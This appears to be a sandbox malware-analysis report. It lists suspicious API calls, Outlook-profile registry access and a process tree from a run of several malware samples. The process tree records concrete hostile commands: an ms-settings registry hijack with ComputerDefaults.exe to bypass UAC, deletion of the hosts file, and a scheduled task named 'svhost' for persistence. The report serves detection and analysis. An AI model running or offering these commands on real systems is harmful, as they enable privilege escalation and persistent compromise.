N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\stail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\filer.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\xxz.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\PctOccurred.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif N/A
N/A N/A C:\Users\Admin\Desktop\Files\pp.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\av_downloader1.1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\System.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\._cache_System.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif N/A
N/A N/A C:\Users\Admin\Desktop\Files\Opdxdyeul.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4960 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\New Text Document mod.exe C:\Users\Admin\Desktop\a\fHR9z2C.exe
PID 4960 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\New Text Document mod.exe C:\Users\Admin\Desktop\a\fHR9z2C.exe
PID 3828 wrote to memory of 3628 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 3628 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3628 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3628 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3828 wrote to memory of 4692 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 4692 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4692 wrote to memory of 1748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4692 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4692 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3828 wrote to memory of 1936 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 1936 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 1936 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 4360 wrote to memory of 5080 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 4360 wrote to memory of 5080 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 5080 wrote to memory of 4904 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 5080 wrote to memory of 4904 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 3828 wrote to memory of 3840 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 3840 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 4660 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 4660 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 4660 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4660 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3828 wrote to memory of 2492 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 2492 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 2492 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2492 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3828 wrote to memory of 324 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 324 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 324 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3828 wrote to memory of 1296 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 1296 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 1296 wrote to memory of 3244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 1296 wrote to memory of 3244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 3244 wrote to memory of 3632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 3244 wrote to memory of 3632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 3632 wrote to memory of 1288 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\netsh.exe
PID 3632 wrote to memory of 1288 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\netsh.exe
PID 3828 wrote to memory of 1372 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 1372 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3892 wrote to memory of 2484 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\built.exe
PID 3892 wrote to memory of 2484 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\built.exe
PID 3828 wrote to memory of 4576 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 3828 wrote to memory of 4576 N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4576 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2484 wrote to memory of 3636 N/A C:\Users\Admin\Desktop\Files\built.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2484 wrote to memory of 3636 N/A C:\Users\Admin\Desktop\Files\built.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2484 wrote to memory of 4384 N/A C:\Users\Admin\Desktop\Files\built.exe C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
PID 2484 wrote to memory of 4384 N/A C:\Users\Admin\Desktop\Files\built.exe C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
PID 4384 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4384 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3892 wrote to memory of 1432 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
PID 3892 wrote to memory of 1432 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
PID 3892 wrote to memory of 1432 N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
PID 4384 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe C:\Windows\system32\cmd.exe
PID 4384 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe C:\Windows\system32\cmd.exe
PID 3944 wrote to memory of 3840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Desktop\a\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Desktop\a\caspol.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\smartscreen.exe

C:\Windows\System32\smartscreen.exe -Embedding

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Users\Admin\Desktop\New Text Document mod.exe

"C:\Users\Admin\Desktop\New Text Document mod.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\a\fHR9z2C.exe

"C:\Users\Admin\Desktop\a\fHR9z2C.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1998.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1998.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\1998.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\1998.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8504.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8504.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\8504.vbs

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\8504.vbs

C:\Users\Admin\Desktop\Files\built.exe

"C:\Users\Admin\Desktop\Files\built.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe

"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cjlDDzoa4tYZ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

